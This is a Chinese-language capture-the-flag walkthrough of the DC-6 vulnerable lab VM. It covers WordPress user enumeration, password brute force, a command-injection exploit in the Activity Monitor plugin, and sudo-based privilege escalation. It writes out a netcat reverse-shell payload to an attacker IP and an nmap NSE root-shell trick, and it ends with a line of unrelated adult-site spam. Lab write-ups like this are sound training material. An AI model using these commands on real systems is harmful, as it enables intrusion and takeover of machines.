DC-6靶機滲透測試詳細教程

  • 作者:
  • 時間:2022-10-22 17:15:54
簡介 DC-6靶機滲透測試詳細教程

DC-6教程

描述

DC-6 是另一個特意建造的易受攻擊的實驗室,旨在獲得滲透測試領域的經驗。

這不是一個過于困難的挑戰,所以應該非常適合初學者。

此挑戰的最終目標是獲得 root 權限并讀取唯一的標志。

必須具備 Linux 技能和熟悉 Linux 命令行,以及一些基本滲透測試工具的經驗。

使用工具

攻擊者:kali 192.168.110.4

靶機:DC-6 192.168.1.191

一、信息收集

0x01 查看存活主機和端口

由于主機和靶機不在同一個網段,這里我們直接使用nmap掃描ip地址和端口

nmap -PS 192.168.1.0/24

 

0x02 查看端口開放的服務

nmap -sV -T4 -O -p 80,22 192.168.1.191

 

0x03 查看主機指紋信息

whatweb http://192.168.1.191

 

0x04 訪問靶機HTTP服務

發現瀏覽器找不到此網站(dns無法解析此ip)

 

添加“192.168.1.191 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)

 

同樣在kali的/etc/hosts文件下也加上此語句

vim /etc/hosts

 

在網站內隨便點一下

 

發現這個地方點進去后有登錄選項

 


 

二、漏洞發現

0x01 用戶名枚舉

wpscan --url http://wordy/ -e u

 

0x02 暴力破解用戶名口令

將剛剛枚舉到的用戶名存儲在桌面上的文本文檔中

vim users.txt

 

暴力破解

wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt

 

使用dirb掃描出來管理員登錄界面

dirb http://wordy/

 

打開登錄界面輸入賬號密碼登錄

 


 

發現activity monitor插件

 

0x03 漏洞信息查詢

嘗試搜索此插件的漏洞信息

msfconsole
search activity monitor

 

查找到一個漏洞,查看使用手冊

use exploit/unix/webapp/wp_plainview_activity_monitor_rce
show options

 

01 背景介紹 WordPress 插件Plainview Activity Monitor存在一個遠程命令執行漏洞。Plainview Activity Monitor 是一款網站用戶活動監控插件。遠程攻擊者可以通過構造的url來誘導wordpress管理員來點擊惡意鏈接最終導致遠程命令執行。
02 影響范圍
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默認后臺
wp-login.php Activity Monitor >tools 用命令執行
04 漏洞序號
CVE-2018-15877

查看漏洞文件

 

發現這個一個html文件,將html標簽復制到一個文件上

vi 45274.html

 

三、漏洞利用

0x01 命令執行漏洞

嘗試拼接命令

ping 192.168.1.191|ls

 


 


 

使用kali監聽9999端口

nc -lvvp 9999

 

在網頁框中輸入

ping 192.168.110.4| nc -e /bin/bash 192.168.110.4 9999

然后點擊Lookup

 

0x02getshell成功

可以看到我們已經拿到shell

 


 

0x03開啟終端

python -c ‘import pty;pty.spawn("/bin/bash")’

開啟一個python終端

 

四:提權

0x01查看用戶信息

cd 到/home/mark目錄下查看文件things-to-do 文檔,查看

 

提示到有用戶 graham的口令,嘗試su graham切換用戶,查看jens用戶下文件信息,發現對backups.sh文件具有可執行權限,且以jens用戶執行。嘗試寫入反彈終端命令并執行

 

查看jens用戶下文件信息,發現對backups.sh文件具有可執行權限,且以jens用戶執行。嘗試寫入反彈終端命令并執行

 

0x02轉換身份

echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh

嘗試以jens身份執行此文件,發現切換成功

 

0x03 找到提權點

sudo -l 查看用戶當前可執行的sudo命令,發現nmap命令執行時以root身份執行,嘗試編寫提權腳本

echo "os.execute('/bin/bash')">demon.nse

nse為nmap可執行文件后綴,此命令為開啟一個終端(以當前身份)

 

sudo nmap --script=/home/jens/demon.nse

執行此腳本

 

提權成功

 

進入到root,找到flag

cat /root/theflag.txt

 

DC-6總結

hosts定向

wpscan枚舉賬號(因為是WordPress博客)

wpscan賬號密碼爆破

dirb目錄掃描得到admin登錄地址

發現命令注入漏洞

使用burp抓包修改數據反彈shell

打開交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

進入到home目錄查看DC-6的用戶目錄

發現graham賬號的密碼,進行ssh登錄成功

使用sudo -l查看權限

利用命令腳本轉換到jens用戶

發現可執行root的文件為nmap

創建一個nmap文件執行腳本

只想nmap文件執行腳本獲取到root

韩国19禁A片在线播放,色猫咪免费人成网站在线观看,中国最猛性XXXXX,五月天天爽天天狠久久久综合